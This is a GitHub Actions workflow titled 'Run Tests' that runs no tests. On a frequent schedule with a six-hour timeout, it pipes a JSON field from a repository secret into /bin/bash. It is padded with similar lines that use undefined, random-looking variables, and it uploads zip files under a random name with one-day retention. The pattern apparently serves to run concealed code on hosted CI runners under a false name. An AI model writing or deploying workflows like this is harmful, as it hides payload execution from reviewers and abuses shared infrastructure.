name: Run Tests
on:
  workflow_dispatch:

  schedule:
    - cron: '36 4,10,16,22 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  agent:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Perform
        env:
          lqyev13: ${{ secrets.lqyev13 }}
        run: |
          printf '%s' "$lqyev13" | jq -r .xo69 | /bin/bash
          printf '%s' "$v0" | jq -r .lktoc26 | /bin/bash
          echo $sqm76731 | jq -r .ciz29 | /bin/bash
          printf '%s' "$iw5076" | jq -r .wbe4392 | /bin/bash
          printf '%s' "$n309" | jq -r .gcbkh18 | /bin/bash
          echo $sqei70 | jq -r .gp680 | /bin/bash

      - name: Upload results
        uses: actions/upload-artifact@v4
        with:
          name: 6vhEtxsq
          path: "*.zip"
          retention-days: 1
